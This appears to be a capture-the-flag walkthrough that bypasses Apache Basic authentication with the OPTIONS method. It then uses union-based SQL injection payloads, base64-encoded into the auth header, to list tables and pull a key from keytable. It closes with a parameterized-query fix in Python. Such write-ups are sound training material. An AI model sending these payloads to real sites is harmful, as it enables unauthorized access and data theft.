
[wowhacker] No. 7 (AuThWithMySQL)


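[Working through the AuThWithMySQL/index.html page, which asks for Apache authentication when the site is accessed]


[To bypass authentication, switch the HTTP method from GET to OPTIONS while logging in as Leo/1234]

Confirmed that the site's credentials (ID/password) are base64-encoded and used as the authentication value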
TGVvOjEyMzQ=  //  Leo:1234
 

Putting a quote in the ID field, base64-encoding it and sending it produces a MySQL error (SQL injection)

To find the number of fields, try again with one more field each time

Leo'union select '1'#:1234
TGVvJ3VuaW9uIHNlbGVjdCAnMScjOjEyMzQ=

Leo'union select '1','2'#:1234
TGVvJ3VuaW9uIHNlbGVjdCAnMScsJzInIzoxMjM0

Leo'union select '1','2','3'#:1234
TGVvJ3VuaW9uIHNlbGVjdCAnMScsJzInLCczJyM6MTIzNA==

Leo'union select '1','2','3','4'#:1234
TGVvJ3VuaW9uIHNlbGVjdCAnMScsJzInLCczJywnNCcjOjEyMzQ=

Leo'union select '1','2','3','4','5'#:1234
TGVvJ3VuaW9uIHNlbGVjdCAnMScsJzInLCczJywnNCcsJzUnIzoxMjM0

Leo'union select '1','2','3','4','5','6'#:1234
TGVvJ3VuaW9uIHNlbGVjdCAnMScsJzInLCczJywnNCcsJzUnLCc2JyM6MTIzNA==

Succeeded on the sixth attempt

Retrieve the table and field names through the address field

Leo'union select '1','2','3',(select group_concat(table_name) from information_schema.tables),'5','6'#:1234
TGVvJ3VuaW9uIHNlbGVjdCAnMScsJzInLCczJywoc2VsZWN0IGdyb3VwX2NvbmNhdCh0YWJsZV9uYW1lKSBm
cm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMpLCc1JywnNicjOjEyMzQ=
 



# address:

CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,keytable,user_info


The table named keytable looks suspicious
Inspect that table

Leo'union select '1','2','3',(select group_concat(column_name) from information_schema.columns where table_name='keytable'),'5','6'#:1234
TGVvJ3VuaW9uIHNlbGVjdCAnMScsJzInLCczJywoc2VsZWN0IGdyb3VwX2NvbmNhdChjb2x1bW5fbmFtZSkgZnJ
vbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9uYW1lPSdrZXl0YWJsZScpLCc1JywnNic
jOjEyMzQ=


# address: no,value 

Leo'union select '1','2','3',(select value from keytable limit 0,1),'5','6'#:1234
TGVvJ3VuaW9uIHNlbGVjdCAnMScsJzInLCczJywoc2VsZWN0IHZhbHVlIGZyb20ga2V5dGFibGUgbGltaXQgMCwx
KSwnNScsJzYnIzoxMjM0 
 


Key obtained
address: If you dream it, you can do it  
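
The root cause above is that the base64-decoded Basic-auth user name reaches the SQL text unescaped. The following is an added example, not code from the challenge or the original post, showing the same lookup with placeholder binding; Python's sqlite3 stands in for MySQL, and the `user_info` column names, the salt and the stored address are constructed assumptions.

```python
import base64, binascii, hashlib, hmac, sqlite3

def parse_basic(header):
    """Decode an HTTP Basic Authorization header into (user, password), or None."""
    scheme, _, token = header.partition(" ")
    if scheme.lower() != "basic":
        return None
    try:
        decoded = base64.b64decode(token.strip(), validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    user, sep, password = decoded.partition(":")  # only the first ':' separates
    return (user, password) if sep else None

def pw_hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def make_db():
    """Constructed stand-in for the user_info table (columns are assumptions)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user_info "
               "(id TEXT PRIMARY KEY, salt BLOB, pw BLOB, address TEXT)")
    salt = b"constructed-salt"
    db.execute("INSERT INTO user_info VALUES (?, ?, ?, ?)",
               ("Leo", salt, pw_hash("1234", salt), "constructed address"))
    return db

def authenticate(db, header):
    """Return the user's address on success, None otherwise."""
    creds = parse_basic(header)
    if creds is None:
        return None
    user, password = creds
    # Placeholder binding: the decoded user name is data, never SQL text.
    row = db.execute("SELECT salt, pw, address FROM user_info WHERE id = ?",
                     (user,)).fetchone()
    if row is None:
        return None
    salt, stored, address = row
    return address if hmac.compare_digest(stored, pw_hash(password, salt)) else None

if __name__ == "__main__":
    db = make_db()
    print(authenticate(db, "Basic TGVvOjEyMzQ="))  # header value from the page
    print(authenticate(db, "Basic TGVvJ3VuaW9uIHNlbGVjdCAnMScjOjEyMzQ="))
```

With binding, the quote and `union select` text are compared as a literal user name that matches no row, so no database error or extra result row reaches the response.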

